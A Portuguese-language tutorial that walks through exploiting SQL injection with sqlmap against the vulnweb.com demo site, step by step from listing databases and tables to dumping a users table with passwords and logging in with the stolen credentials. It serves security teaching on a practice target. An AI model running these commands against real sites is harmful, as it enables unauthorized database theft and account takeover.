O SQLMAP é uma ferramenta de injeção SQL desenvolvida em Python, seu objetivo é detectar e explorar vulnerabilidades de injeção SQL em aplicações ou sites web, uma vez que se detecta uma ou mais injeções de SQL em um alvo, o usuário pode escolher entre uma variedade de opções que o SQLMAP disponibiliza para explorar os dados armazenados dentro do banco de dados. | ||
01 — Passo | ||
Para realizar a execução do SQLMAP é necessário utilizar um parâmetro GET exemplo: www.site.com/index.php?id=1, então para isso navegue no site ate encontrar a opção como no exemplo abaixo: | ||
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –-dbs | ||
-u : URL, Endereço do site. | ||
02 — Passo | ||
Durante o processo de execução o SQLMAP já detecta que o banco de dados do site é MySQL e você pode ser questionado se deseja pular a verificação para outros tipos de banco de dados ou se você que fazer um teste mais profundo sobre o banco de dados detectado, neste caso responda Y (Yes/Sim). | ||
03 — Passo | ||
Neste momento o SQLMAP já detectou que o parâmetro cat está vulnerável e você é questionado se deseja realizar outros testes, no momento selecione N (Not/Não). | ||
04 — Passo | ||
Como pode visualizar os banco de dados são exibidos: | ||
[*] acuart | ||
05 — Passo | ||
Agora que foram listados os banco de dados vamos extrair as tabelas do banco de dados acuart. | ||
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –-dbs -D acuart –-tables | ||
-D : Define o banco de dados que será avaliado. | ||
06 — Passo | ||
Como resultado são extraídas 8 tabelas do banco de dados acuart. | ||
+ artists | ||
07 — Passo | ||
Vamos extrair todas as colunas existentes na tabela users. | ||
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –-dbs -D acuart -T users –-columns | ||
-T : Define a tabela que será avaliada. | ||
08 — Passo | ||
Como resultado são extraídas 8 colunas da tabela users. | ||
+ address | ||
09 — Passo | ||
Neste passo iremos realizar o DUMP ou seja extrair todas as informações cadastradas nas colunas da tabela users. | ||
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –-dbs -D acuart -T users -C name,pass,uname,email –-dump | ||
-C : Define as colunas que será avaliada. | ||
10 — Passo | ||
Segue abaixo todos os dados extraídos: | ||
pass: test | ||
11 — Passo | ||
Munido das informações extraídas realize o acesso ao sistema:. | ||
Site: testphp.vulnweb.com/login.php | ||
12 — Passo | ||
Login realizado com sucesso, basta confirmar as informações. | ||